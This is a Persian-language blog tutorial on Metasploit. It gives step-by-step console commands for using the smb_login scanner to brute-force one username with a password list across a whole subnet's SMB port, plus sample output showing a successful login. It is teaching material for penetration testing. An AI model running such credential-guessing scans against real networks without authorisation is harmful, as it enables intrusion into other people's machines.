منبع اصلی نوشتار زیر در این لینک قرار دارد

آموزش متااسپلویت : SMB Login Check

سلام دوستان . همان طور که از عنوان پیداست قصد شروع آموزش های مرحله به مرحله ی متااسپلویت را داریم . لازم به ذکر است که این آموزش ها برای افرادی است که آشنایی متوسطی از کار با این framework را دارند . هم چنین در هر پست یک سناریو مورد بررسی قرار می گیرد . سعی شده تمامی آموزش های گرد آوردی شده از این منبع باشد تا دسته بندی منظم تری داشته باشد . ضمن این که بعضی از مطالب از طرف نویسنده و منابع دیگر نوشته شده است . لازم به ذکر است که تا الان 17 سری از آموزش ها تهیه و تا 10 مرداد زمان بندی شده است . طبق زمان بندی ای که بر روی آموزش ها انجام گرفته , از امروز هر شنبه یک پست از این سری منتشر خواهد شد .

اما سناریو ای که امروز در مورد آن صحبت می کنیم اسکن کردن تعدادی یوزر و پسورد بر روی پورت 445 کلاینت های یک شبکه می باشد .

توپولوژی فرضی شبکه :

OSLearn.ir_001

ابتدا اسکنر زیر را در کنسول متااسپلویت انتخاب می کنیم :

msf > use auxiliary/scanner/smb/smb_login

برای مشاهده ی امکانتی که در پیش داریم دستور زیر را اجرا می کنیم :

msf auxiliary(smb_login) > show options

OSLearn.ir_002

توجه داشته باشید مواردی که مقدار آن ها در زیر ستون Required برابر yes است حتما باید لحاظ شوند .

ابتدا فایل پسورد لیستی که قرار است روی تمامی کلاینت ها بررسی شود را انتخاب می کنیم :

msf auxiliary(smb_login) > set PASS_FILE /root/PasswordList/Passlist.0001.txt

حال username ای که قرار است در تمامی کلاینت ها بررسی شود را انتخاب می کنیم :

msf auxiliary(smb_login) > set SMBUser OSLearn

فرض بر آن شده است که تعدادی کلاینت در یک شبکه ی Workgroup با نام OSGroup وجود دارد . پس :

msf auxiliary(smb_login) > set SMBDomain OSGroup

برای افزایش سرعت پویش , THREADS را بر روی 50 انتخاب می کنیم :

msf auxiliary(smb_login) > set THREADS 50

فرض شده است که آدرس شبکه 192.168.30.0/24 کی باشد . پس برای تست پسورد لیست بر روی کلیه ی کلاینت ها به شکل زیر عمل می کنیم :

msf auxiliary(smb_login) > set RHOSTS 192.168.30.0/24

در نهایت برای اجرای پویش به صورت زیر عمل می کنیم :

msf auxiliary(smb_login) > run

[*] 192.168.30.10 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.30.20 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.30.30 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.30.40 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.30.50 - SUCCESSFUL LOGIN (Windows)
[*] Auxiliary module execution completed

نکته : پورت پیش فرض SMB 445 می باشد اما برای تغییر آن به صورت زیر عمل می کنیم :

msf auxiliary(smb_login) > set RPORT [PORT]

 

موفق و موید باشید

منبع : او اس لرن دات آی آر | http://OSLearn.ir

نویسنده : E2MA3N



برچسب ها :